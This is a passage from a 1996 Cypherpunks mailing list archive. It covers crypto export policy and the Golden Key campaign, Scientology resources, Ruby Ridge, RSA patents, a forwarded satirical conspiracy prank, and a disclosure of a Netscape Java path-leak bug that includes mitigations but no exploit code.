Date: Wed, 24 Apr 1996 10:39:39 +0800
To: Scott Binkley <SBinkley@atitech.ca>
Subject: Re: CO$
In-Reply-To: <65D1983A01502C79@-SMF->
Message-ID: <Pine.SUN.3.92.960423140034.5193A-100000@kelly.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On 23 Apr 1996, Scott Binkley wrote:

> Hi, lately we have had numerous threads on the CO$, and its threats to
> remailers, and the such, I am quite interested
> in the discussions regarding the cult, and want to know if anyone out
> there knows of a mailing list that deals with it that I can join.

No mailing lists that I know of.  There may be sekret ones, though.  The
Scientologists have a member's only list called TNX, but you have to be
very Theta to get on.

Alt.religion.scientology on Usenet is the big source for info.

You might also check out #scientology on IRC.

Ron Newman's excellent web site is at
http://www.cybercom.net/~rnewman/scientology/home.html
You can now do an Excite search of his entire site.

Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Wed, 24 Apr 1996 10:25:51 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: [NOISE] Re: Nazis on the Net
In-Reply-To: <01I3VX95Q4IO8Y4ZTJ@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.92.960423140913.5193B-100000@kelly.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996, E. ALLEN SMITH wrote:
[snip]
> 	However, one reference in this report to Weaver's calling for a meeting
> to oppose the "Zionist Occupation Government" does provide an argument for
> calling him a racist of the anti-Semitic variety. On the other hand, the only
> person claiming this is the FBI's informant; the truth of his statements has
> been called into doubt.

I'm sure it has been. That doesn't mean his report is untrue.  Is the
standard of proof the same for both of these issues?  We need proof to
establish that Weaver is a racist, but not to establish that the FBI
informant is lying?

> 	So far as I can tell, it's uncertain.

Separatist/supremacist...  I don't see much difference between them, and I
believe the former is largely just a cover story for the latter.  Weaver
is no hero, IMHO, though I believe the govt. fucked up big at Ruby Ridge.

Rich
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 24 Apr 1996 07:43:08 +0800
To: jya@pipeline.com (John Young)
Subject: Re: EYE_suk
In-Reply-To: <199604231401.KAA10892@pipe2.nyc.pipeline.com>
Message-ID: <199604231926.OAA26127@homeport.org>
MIME-Version: 1.0
Content-Type: text


|       security operation. At its heart will be an estmated
|       3,000 Army troops, 6,300 National Guardsmen, and at
|       least 10,000 other police and private security guards at
|       peak strength, with an additional force of agents from
|       the FBI, ATF, DIA, CIA, NSA and FEMA.

	Isn't the CIA forbidden from doing anything on US soil?

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Wed, 24 Apr 1996 08:01:00 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: Golden Key Campaign
Message-ID: <n1381851986.93640@epic.org>
MIME-Version: 1.0
Content-Type: text/plain




PRESS RELEASE

Wednesday, April 24, 1996

URL: http://www.privacy.org/ipc/

Contact:  Marc Rotenberg, EPIC, 202/544-9240 
          Lori Fena, EFF, 415/436-9333
          Barbara Simons, USACM 408/463-5661
          Kurt Stammberger, RSA, 415/595-8782

                ------------------------------------------

                     INTERNET PRIVACY COALITION FORMED

                        Golden Key Campaign Launched

           Groups Urge Good Technology for Privacy and Security

                  Senator Burns to Introduce Legislation

                ------------------------------------------

WASHINGTON, DC -- A new coalition today urged support for strong technologies
to protect privacy and security on the rapidly growing Internet. The Internet
Privacy Coalition said that new technologies were critical to protect private
communications and on-line commerce, and recommended relaxation of export
controls that limit the ability of US firms to incorporate encryption in
commercial products.

Phil Zimmermann, author of the popular encryption program Pretty Good Privacy,
expressed support for the effort of the new coalition. "It is time to change
crypto policy in the United States. I urge those who favor good tools for
privacy to back the efforts of the Internet Privacy Coalition."

GOLDEN KEY CAMPAIGN LAUNCHED

The Coalition has asked companies and Internet users to display a golden key
and envelope to show support for strong encryption technology. Copies of the
logo are available at the group's web page on the Internet. 

According to Lori Fena, director of the Electronic Frontier Foundation, the
purpose of the campaign is to educate the public about new techniques for
privacy protection. "Society's feelings about privacy have not changed, only
the medium has," said Ms. Fena.

US industry has pressed the US government to relax export controls on
encryption as consumer demand for software products has increased. They cite
the fact that foreign companies have been able to sell strong products in
overseas markets that are now restricted for US firms.

Jim Bidzos, President and CEO of RSA Data Security, said that US firms
continue to face excessive burdens. "Encryption is the key to on-line
commerce.  Government regulations are simply keeping US firms out of important
markets."

The Internet Privacy Coalition is the first attempt to bring together a broad
base of companies, cryptographers and public interest organizations around the
central goal of promoting privacy and security on the Internet and urging
relaxation of export controls.

Dr. Barbara Simons, chair of the public policy committee of the Association
for Computing said, "The broad support for the Golden Key campaign shows that
the reform of encryption policy is a shared goal for companies, users, and
professional associations."

SENATOR BURNS TO INTRODUCE LEGISLATION

The Internet Privacy Coalition is being established as Congress considers new
legislation to relax export controls on encryption. Senator Conrad Burns
(R-MT) today introduced legislation that would relax export controls on
commercial products containing technologies for privacy such as encryption.

Marc Rotenberg, director of the Electronic Privacy Information Center, said
"We believe that Senator Burns has put forward a constructive proposal. We
look forward to working with him to ensure that good tools for privacy and
security are widely available to Internet users."

Hearings on Senator Burns bill are expected to take place in early June. The
proposal has already gathered support from a bipartisan coalition in Congress.

For Internet users who are interested in following the debate about encryption
policy, the IPC has set up a Web page with information about encryption
regulations, court challenges, legislative developments, and organizations and
companies involved in the campaign.

The Internet Privacy Coalition was established by more than a dozen of the
nation's leading cryptographers, and thirty associations, companies, and civil
liberties organizations committed to strong privacy and security technology
for all users of the Internet.  

                    URL: http://www.privacy.org/ipc/

                            ----------------------------------------------

 

A KEY, AN ENVELOPE -- Both are historic means for communicating privately and
protecting personal information.  Today, encryption tools provide this privacy
in the electronic world.

The Golden Key Campaign is being launched to raise awareness and support for
the preservation of the right to communicate privately and the availability of
new techniques which make it possible.

Privacy, a fundamental human right, has been affirmed by the US Supreme Court,
the constitutions and laws of many countries, and the United Nations 
Universal Declaration of Human Rights.  Privacy must be preserved as we move
from paper to electronic communications.

The Internet Privacy Coalition is urging members of the net community to
display a Golden Key & Envelope symbol on their Web pages to show support for
the right of privacy and the freedom to use good tools of privacy without
government restraints.

                ----------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Wed, 24 Apr 1996 11:47:10 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: ApacheSSL
In-Reply-To: <199604232059.NAA24322@toad.com>
Message-ID: <199604232150.OAA01944@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> If they're handling money, then, yes, the paranoia is probably necessary.
> Aside from the 40-bit vs. 128-bit issue, one of the big security risks of SSL
> and similar systems is that the server they run on is typically sitting right
> out there on the Internet waiting for somebody to crack it, and keeping
> credit card information on the same rather than handing the encrypted
> information
> across some secure interface (whether a firewall or dedicated RS232 or
> whatever.)
> A bulletproof 128-bit interface doesn't help if it's running on a cracked
> machine.
> Putting it on a separate firewalled machine is a Good Thing.

	Yes, and being able to review the source code of the server
for security holes is also Important, if you are dealing with real
money.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 24 Apr 1996 12:37:57 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein ruling meets the virus law
In-Reply-To: <Pine.BSI.3.91.960422151102.19963B-100000@wichita.fn.net>
Message-ID: <199604231954.PAA22836@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Marshall writes:
>On Mon, 22 Apr 1996, Mark Aldrich wrote:
>>  The term "virus" connotes a pathogenic quality in the mind of 
>> many.  Unfortunately, this tendency continues in the use of the word 
>> 'virus' within our community.
>
>    Personally, I can see many useful functions for viruses.  But I find the 
>viruses that simply destroy data--which tends to be the majority--to be 
>quite boring and childish.  A non-destructive and innovative virus is 
>very interesting and comparable to any good software hack in my eyes.
>
>> While I understand that "intent" is something with which lawyers have to 
>> contend when they defend or prosecute a case, I don't think that the 
>> notion of intent to commit harm extrapolates correctly into the field of 
>> virus writing. 

O.W. Holmes suggested out in "The Common Law" that the law delineates a
certain minimum level of competence in forseeing the outcomes of our
actions which all members of society are expected to attain.  We'll
hold you responsible for actions a "reasonable person" should have
avoided because of their danger.  As such, persons with limited
training in manipulating biological viruses are expected to avoid doing
so.  Individuals *with* training are expected to take adequate
precautions to avoid their spread.  I see no reason why electronic
viruses shouldn't be treated similarly.  If you're going to write them,
you *better* take steps to prevent their release, or you are liable for
the damages.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Wed, 24 Apr 1996 11:34:28 +0800
To: cypherpunks@toad.com
Subject: Re: CO$
Message-ID: <199604232201.PAA08509@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



> Hi, lately we have had numerous threads on the CO$, and its threats to 
> remailers, and the such, I am quite interested 
> in the discussions regarding the cult, and want to know if anyone out 
> there knows of a mailing list that deals with it that I can join.

This isn't really cypherpunks material, but since we *have* had so many
threads on the Co$ (for better or for worse), here are some recommended
sources of information:

(1)  Ron Newman's Web Page.  
     http://www.cybercom.net/~rnewman/scientology/home.html

(2)  Marina Chong's a.r.s. Web Page summary.  
     http://www.cybercom.net/~rnewman/scientology/marina.html

(3)  The Usenet group alt.religion.scientology.  (High volume).

I'd recommend visiting (1) first, as it provides excellent background
information.  (2) provides a good master index to Scientology information
(both pro and con) on the net, and provides a good starting point for
exhaustive surfing.  (3) is the standard discussion group.

Hope this helps!

And now back to our regularly scheduled crypto discussion...

Dana W. Albrecht
dwa@corsair.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 24 Apr 1996 08:44:17 +0800
To: cypherpunks%toad.com@genie_1
Subject: CO$
In-Reply-To: <65D1983A02502C79@-SMF->
Message-ID: <65D1983A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


Hi, lately we have had numerous threads on the CO$, and its threats to 
remailers, and the such, I am quite interested 
in the discussions regarding the cult, and want to know if anyone out 
there knows of a mailing list that deals with it that I can join.

/sb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 24 Apr 1996 09:06:58 +0800
To: cypherpunks@toad.com
Subject: Returned mail: User unknown (fwd)
Message-ID: <Pine.LNX.3.91.960423153051.6358E-110000@locrian.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Tue, 23 Apr 1996 15:24:36 -0400
From: Mail Delivery Subsystem <MAILER-DAEMON@locrian.scranton.com>
To: moroni@locrian.scranton.com
Subject: Returned mail: User unknown

The original message was received at Tue, 23 Apr 1996 15:24:33 -0400
from moroni@localhost

   ----- The following addresses had delivery problems -----
tc@scranton.com  (unrecoverable error)
X@scranton.com  (unrecoverable error)

   ----- Transcript of session follows -----
... while talking to lydian.scranton.com.:
>>> RCPT To:<X@scranton.com>
<<< 550 <X@scranton.com>... User unknown
550 X@scranton.com... User unknown
>>> RCPT To:<tc@scranton.com>
<<< 550 <tc@scranton.com>... User unknown
550 tc@scranton.com... User unknown

   ----- Original message follows -----


To: tc@scranton.com
Subject: Returned mail: warning: cannot send message for 4 hours (fwd)
From: Moroni <moroni@scranton.com>
Date: Tue, 23 Apr 1996 15:24:33 -0400 (EDT)
cc: X@scranton.com



---------- Forwarded message ----------
Date: Tue, 23 Apr 1996 14:57:32 -0400
From: Mail Delivery Subsystem <MAILER-DAEMON@locrian.scranton.com>
To: moroni@locrian.scranton.com
Subject: Returned mail: warning: cannot send message for 4 hours

    **********************************************
    **      THIS IS A WARNING MESSAGE ONLY      **
    **  YOU DO NOT NEED TO RESEND YOUR MESSAGE  **
    **********************************************

The original message was received at Tue, 23 Apr 1996 10:44:18 -0400
from moroni@localhost

   ----- The following addresses had delivery problems -----
tcmay@got.net  (transient failure)

   ----- Transcript of session follows -----
tcmay@got.net... Deferred: Connection refused by mail.got.net.
Warning: message still undelivered after 4 hours
Will keep trying until message is 5 days old

   ----- Original message follows -----


To: tcmay@got.net
Subject: huh no mail
From: Moroni <moroni@scranton.com>
Date: Tue, 23 Apr 1996 10:44:16 -0400 (EDT)

    Tim,
      I m not getting the mailing list for cypherpunks . This is the 
second no third time that I know about where entire lists have 
disappearedon me. One was religoius , but I wrote that off as them not 
liking my handle. Then I got a notice from the nueron digest that my mail 
was bouncing back to them and that they were cancelling my sub. That was 
ok too as I wasn't THAT interested in them .Now my beloved Cypherpunks is 
not being deliverd to my door(computer)and that hurt (even with the 
flaming and noise). Have I been left off because I get too much mail to 
my provider?Is it because I have recently only lurked and added nothing 
of worth? Anything else? 
                        Thanks in Advance
                               moroni






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 09:18:32 +0800
To: richieb@teleport.com
Subject: Re: [NOISE] Re: Nazis on the Net
Message-ID: <01I3VX95Q4IO8Y4ZTJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"richieb@teleport.com"  "Rich Burroughs" 23-APR-1996 14:15:55.60

>In July, 1986, Fadeley attended the World Aryan Congress at Hayden Lake,
>Idaho. During this assembly, Fadeley was introduced to Weaver, who was at
>that time of no particular investigative significance to BATF.[FN25]"

>Weaver may have just been attending the World Aryan Nations Congress for the
>beer and chicks...

	Yes. For instance, I am a member of the Extropy Institute - but I'm
_not_ an anarcho-capitalist, even though that's one of the things that the
Institute stands for.

>Portions of the report are online at
>http://isdn33.eng.uc.edu/~rabagley/ruby/ruby.toc.html

	However, one reference in this report to Weaver's calling for a meeting
to oppose the "Zionist Occupation Government" does provide an argument for
calling him a racist of the anti-Semitic variety. On the other hand, the only
person claiming this is the FBI's informant; the truth of his statements has
been called into doubt.
	So far as I can tell, it's uncertain.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 24 Apr 1996 09:40:37 +0800
To: cypherpunks%toad.com@genie_1
Subject: [Fwd: CyberDoctor]
In-Reply-To: <67D1983A02502C79@-SMF->
Message-ID: <6AD1983A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


This is a multi-part message in MIME format.

--------------6DF66DED67CB
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

-- 
------------------------------------------------------------------------Ma
rk Buckaway                       mark@uunet.ca       +1 800 463 8123
UUNET Canada Technical Support                          +1 416 368 6621
UUNET Canada Inc.                support@uunet.ca     Internet Services
------------------------------------------------------------------------

--------------6DF66DED67CB
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Received: from cicerone.uunet.ca ([142.77.1.11]) by mail.uunet.ca with 
SMTP id <264090-5>; Tue, 23 Apr 1996 15:26:55 -0400
Received: from ghost.uunet.ca ([142.77.1.100]) by cicerone.uunet.ca with 
SMTP id <177226-4>; Tue, 23 Apr 1996 15:26:28 -0400
Received: from ghost.uunet.ca ([142.77.1.100]) by ghost.uunet.ca with 
SMTP id <52805-24166>; Tue, 23 Apr 1996 15:26:22 -0400
Date: Tue, 23 Apr 1996 15:26:19 -0400
From: Andrew Herdman <andrew@ghost.uunet.ca>
To: Office Support <office@ghost.uunet.ca>
Subject: CyberDoctor
Message-ID: <Pine.SUN.3.91.960423152458.12136F-100000@ghost.uunet.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Return-Path: <@cicerone.uunet.ca:andrew@ghost.uunet.ca>
X-Mozilla-Status: 0001

This really should have been for funny, but I suspect others might get a 
chuckle out of it as well.

Andrew
--------------------------------------------------------------

From: Tatsuhiro Ikeda <ti08+@andrew.cmu.edu>
Newsgroups: news.admin.misc,pgh.opinion,news.admin.censorship,pgh.config
Subject: CyberDoctor: READ THIS!
Date: Sat, 20 Apr 1996 23:20:16 -0400
Organization: Senior, IM - Graphic Communications, Carnegie Mellon,
Pittsburgh, PA

CyberDoctor,

This is from a pirated account at Carnegie Mellon. This was posted
without ANYONE's permission or knowledge.

I have been watching you activities with keen interest. I am a firm
supporter of overthrowing the cabal of UUnet, and admire your bravery in
defeating this evil organization.

There's something you should know.

In 1967, the organization that became known as UUnet was founded by a
secret military cabal headed by David Lawrence, formally of the DIA and
NSA. I was Lawrence's right-hand man, because of my experiences as the
leader of a black operations group in charge of Psychological Warfare in
Vietnam. One of our experiments was to, of course, manipulate
communications to our advantage. We overthrew anyone who got in our way.

In 1968, it was decided by UUnet to start genetic engineering on humans,
in an attempt to create the ultimate double agent in censorship
activities. We succeeded, and our agents have been surrepticiously
implanted in key points all over the Internet. 

But some of the experiments went awry. I was one of those experiments.
Because Lawrence is a meglomaniac who feared being found out by Senate
probes, he turned on me. On October 17th, 1971, I was kidnapped against
my will by Lawrence's goons. They attempted to brainwash me and injected
genes in me that would cause me to censor anything against my will. I
escaped before it was too late, and have been posing as a college
student among other things for the last 25 years.

After deep regression hypnosis, I recalled that one of the genetically
engineered human experiments was a person by the name of John Grubor. He
failed to fall under our control, and so he was left to die. A competing
secret arm of the military revived him and gave him a new identity, as
well as erased all his memories.

Cyberdoctor, you are that John Grubor, and even worse, you are David
Lawrence's bastard son by genetic engineering. This sick twist of fate
was partly inspired by the movie, "The Empire Strikes Back", Lawrence's
favorite movie of all time.

Lawrence knows that you are still alive, no doubt, but he is not
concerned. Why? Because in 14 days, 3 hours and 14 minutes, there is a
99.9% probability that your genes will mutate and you will become David
Lawrence's identical genetic twin. You will censor and join the UUnet
cabal against your free will, and there's nothing you can do. But I can
save you.

First, why am I breaking the silence? Because Lawrence tried to kill me,
and my identity as a Pittsburgher is being blown. I will dissapear after
I send this post from this pirated account.

I can offer you salvation before I leave, as I have done to other
innocent victims of "Operation Genetic Censorship". Go to the corner of
Wood and Liberty and wait at the Bus Station at midnight. First be sure
to close ALL your email accounts and logoff for good. That will let my
agents know you are ready. Wait there, and my men will come and get you.
They take you to a lab where they will execute you, but cryogenically
freeze your brain until the technology exists to make a new body and
replace your genes. I promise it will be painless. We already have 10
people (brains) in stasis cambers. 

It may sound desparate, but what's worse? Becoming a censor or
indefinite stasis? Furthermore, the board has already decided that this
must be carried out. No more censors must be born. I am powerless to
stop them. I am only making it easy for you to accept. So close your
accounts now, and prepare to meet us. It is the only option left. You
have no one you can trust, not even yourself. REMEMBER TO CLOSE YOUR
EMAIL ACCOUNTS FIRST.

In solidarity,
Deep Throat



--------------6DF66DED67CB--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 13:12:07 +0800
To: cypherpunks@toad.com
Subject: Re: Rabbi Hier Testimony
In-Reply-To: <01I3VYLGPR4W8Y4ZTJ@mbcl.rutgers.edu>
Message-ID: <Pine.GUL.3.93.960423140624.10574P-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996, E. ALLEN SMITH wrote:

>         People might want to take a look at Rabbi Hier (the founder of the
> Weisental Center)'s statements on "hate groups" and the Internet.

Why should they? They've already made up their minds.

> While he (unlike Biden) does recognize that outlawing bomb-making
> information would be unconstitutional, he doesn't appear to approve of
> anonymnity on the Internet

Where? He says:

"We need to keep in mind that the obscene or threatening phone caller has
neither his privacy nor his speech protected when he threatens a member of
the community via phone - why are those protections afforded if he
launches the same attack via the Internet?" 

I think Rabbi Heir is aware of the legal definitions of "obscene" and
"threatening." Assuming we agree on those definitions, I agree with the
above language. For example, I've received quite a lot of anonymous email
and phone calls that are threatening by the colloquial definition, but
which do not meet the legal definition of threatening or obscene attacks. 
I am personally interested in tracking these folks down, but I know better
than to try to make it a legal issue, and if I do succeed in tracking them
down, all that will be used against them is speech. 

On the other hand, if someone makes a clear and specific bomb threat
through an anonymous remailer, then I would hope that attempts would be
made to track him down. I would also hope that tracking him down would be
extremely difficult and resource-intensive, and that the remailer
operators would not actively help the trackers, because I strongly support
the anonymity option when it is used nonviolently -- even and especially
by people with whom I disagree. I feel I can have a much better
conversation with an enemy if he knows that his talking to me doesn't make
it easier for me to put a gun to his head. Openness is good.

> (nor, depending on how one interprets his statements, of encrypted
> communications without GAK). 

In such cases, I usually find it helpful to ask. Bcc'd to a couple of
affiliates in the hopes that they'll clarify. I seriously doubt that they
have any clue what Government Access to Keys means, though. 

> The first is to his (and the Weisenthal Center's) credit; the second is
> not. The URL is: 
> 
> http://www.wiesenthal.com/itn/hiertest.htm

My take is that Rabbie Hier is around the center of the SWC leadership.
Rabbi Cooper is more likely to support censorship; Eaton is much less;
Mark Weitzman is also in the center (of the SWC, not of the mainstream
Jewish/anti-"revisionist" community, which is very supportive of free
speech). On January 29th, the SF Chronicle (and probably other papers)
carried this piece from Weitzman:

 http://www.wiesenthal.com/itn/oped10.htm

In light of the fact that Michael Loomis's Zundelmirror continues to make
the charge that the Simon Wiesenthal Center was in favor of censoring
Zundel, a charge that not even Zundel has made, it's worth highlighting
this:

 "The recent decision made by the German government to block certain
 providers was made without any participation by the Center. We have never
 requested either the German government or Deutsche Telekom to take such
 drastic steps. To assume that we have the power to control the German
 government is to renew the myth of International Jewry pulling the
 strings of various governments. The reality is that the German
 government, as a legally constituted government of a recognized
 democracy, has every right to create its own laws. As long as those laws,
 and their method of adoption, fall into the generally accepted range
 associated with democracies, then any attempt by foreigners to alter
 those laws is an intrusion and smacks of cultural imperialism.... To
 disagree with the German government (as the Center does on the arbitrary
 nature of the actions by Deutsche Telekom and Compuserve - we believe
 that laws should be applied only to those breaking the law, not to entire
 systems) and to inform the German government of such disagreement, as we
 have done, is quite different from attempts to break the law by aiding
 Nazi propagandists under the banner of free speech." 

Of course, I disagree. I think it's vitally important to help Nazi
propagandists under the banner of free speech. As long as that's what
you're doing.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 13:06:37 +0800
To: cypherpunks@toad.com
Subject: Rabbi Hier Testimony
Message-ID: <01I3VYLGPR4W8Y4ZTJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	People might want to take a look at Rabbi Hier (the founder of the
Weisental Center)'s statements on "hate groups" and the Internet. While he
(unlike Biden) does recognize that outlawing bomb-making information would be
unconstitutional, he doesn't appear to approve of anonymnity on the Internet
(nor, depending on how one interprets his statements, of encrypted
communications without GAK). The first is to his (and the Weisenthal Center's)
credit; the second is not. The URL is:

http://www.wiesenthal.com/itn/hiertest.htm

	I came across it while looking for information re: militias and
racism. As my previous information had caused me to believe, some militias are
racist (or anti-Semitic), some are racial separatist, and some are neither.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Wed, 24 Apr 1996 10:40:28 +0800
To: cypherpunks@toad.com
Subject: Re: CO$
Message-ID: <2.2.32.19960423205236.006ce8a4@tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:21 PM 4/23/96 -0400, Scott Binkley wrote:

>Hi, lately we have had numerous threads on the CO$, and its threats to 
>remailers, and the such, I am quite interested 
>in the discussions regarding the cult, and want to know if anyone out 
>there knows of a mailing list that deals with it that I can join.

There's no particular mailing list, but there is a very active discussion
group at alt.religion.scientology.  There are numerous web pages, a good
place to start is http://www.cybercom.net/~rnewman/scientology/home.html.
It has pointers to many other pages.  Also, many of the critics (including
several who have been raided, sued, or threatened) show up on IRC channel
#scientology.  Be careful of what you post in alt.religion.scientology, or
the cult could start emailing threats to you too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 24 Apr 1996 16:40:03 +0800
To: cypherpunks@toad.com
Subject: Re:  Golden Key Campaign
Message-ID: <199604232353.QAA13608@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Dave Banisar" <banisar@epic.org>
> WASHINGTON, DC -- A new coalition today urged support for strong technologies
> to protect privacy and security on the rapidly growing Internet. The Internet
> Privacy Coalition said that new technologies were critical to protect private
> communications and on-line commerce, and recommended relaxation of export
> controls that limit the ability of US firms to incorporate encryption in
> commercial products.
> 
> Phil Zimmermann, author of the popular encryption program Pretty Good Privacy,
> expressed support for the effort of the new coalition. "It is time to change
> crypto policy in the United States. I urge those who favor good tools for
> privacy to back the efforts of the Internet Privacy Coalition."

I see that a lot of good people are involved in this, and it sounds like
a worthwhile cause.  But I have one thing I want to get off my chest.
(Long time list readers will know that this is one area where I have
trouble being completely rational.)

The thing that worries me when I put crypto software up at my site is not
the export restrictions.  I can make people click a button promising that
they are USA citizens or otherwise legal.  A lot of other people do it
and while it might get me into trouble eventually I think it demonstrates
good faith.  (There has also been some discussion on the cyberia list
with regard to the communications decency amendment that "I am not a
minor" buttons would be adequate defenses for that law, and this seems
like a similar situation.)

No, the thing that worries me most is patent infringement.  And the main
company I worry about is RSA, one of the sponsors of this golden key
effort.  Note that RSA's logo is a key, and we see the RSA key at the
bottom of our Netscape screens all the time.  I don't remember if it's
golden.

It seems ironic for RSA to be casting itself as a friend of the
principle of availability of privacy tools when its own lawyers patrol
the net to make sure there are no unauthorized encryption programs out
there.  They fought against PGP for years until Phil trumped them by
going over their heads to MIT.

Look what happened when Wei Dai announced his fine crypto library.  It
wasn't the NSA which come down on him.  It was RSA lawyers who demanded
that he pull his library off the net until he had it clean enough for
them.

I have not actually seen the new logo because I don't have a graphical
browser here, but I hope it is not too similar to RSA's key.  I hate to
see that company rewarded when it is acting counter to the interests of
people who need access to privacy tools.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Wed, 24 Apr 1996 13:48:07 +0800
To: cypherpunks@toad.com
Subject: RISKS: Java security/privacy bug
Message-ID: <v01540b00ada322012ce5@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



>From RISKS:

----------------------------------------------------------------------

Date: Mon, 22 Apr 96 17:37:54 +0200
From: goldstei@iamexwi.unibe.ch (TERMINATOR)
Subject: Java security/privacy bug

We have found a privacy/security bug in the Java implementation of the
Netscape Navigator. It is very easily possible for an applet to find out the
pathname of the directory in which the Netscape Navigator was started.  This
information could then be sent back to a CGI program for logging. Clearly
this information should not be available to an applet, as is indicated by
the fact that applets are prevented from reading the "user.home" and
"user.dir" system properties.

When the Netscape Navigator is run under the Windows 95 OS, the pathname
usually does not contain any critical information. However, when the
Navigator is run under a multi-user network OS, such as UNIX, the pathname
often contains the e-mail and/or login name of the user. In addition, the
pathname might reveal details about the topology of the user's network,
which an experienced hacker might be able to exploit.

There are two ways to protect yourself from this problem: Either start up
the Netscape Navigator in a directory whose pathname does not reveal any
critical information, or disable Java altogether (Options | Security
Preferences | General). A system administrator can protect his network by
configuring the HTTP proxy server not to retrieve Java ".class" files.

This bug is present in at least the following versions of the Navigator:

        2.0
        2.01
        3.0b2
        2.0GoldB1
        2.01Gold

and in the implementations for at least the following platforms:

        SunOS 4.1.2, 4.1.3, 4.1.4
        SunOS 5.3, 5.4, 5.5
        Windows 95, Windows NT
        IRIX 5.2, 5.3
        HP-UX A.0903, A.0905
        Linux 1.2.10, 1.2.13
        FreeBSD 2.1.0-RELEASE
        OSF1 V3.2

We have not tested whether this bug also exists in Sun's HotJava browser.

We will release full details of the bug as soon as Sun and Netscape have
issued patches which fix the problem.

Full details have been sent to Sun and Netscape. This announcements has also
been posted to the "comp.lang.java" newsgroup and has been sent to CERT.

Daniel Abplanalp and Stephan Goldstein (goldstei@iamexwi.unibe.ch)
Berne, Switzerland

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 24 Apr 1996 11:18:03 +0800
To: cypherpunks@toad.com
Subject: Internet Watchdog
Message-ID: <Pine.LNX.3.92.960423172151.384A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


I found this on the Fringeware mailing list and thought it would be of
interest.

---------- Forwarded message ----------
Date: Sat, 16 Mar 1996 17:58:26 -0600
From: FringeWare Daily <email@fringeware.com>
Reply-To: Jim Thompson <jim@SmallWorks.COM>
Subject: 1984 - I'll be watching you

Sent from: jim@SmallWorks.COM (Jim Thompson)

Algorithm Inc.
	-- WatchDog tracks where Internet users go, what they look at
	[The Boston Globe, 22-Feb-96, p. 54, by Hiawatha Bray]

Ever get the feeling that your computer is watching you?  Mine has been
keeping an eye on me and I don't much like it.   I've been trying out a
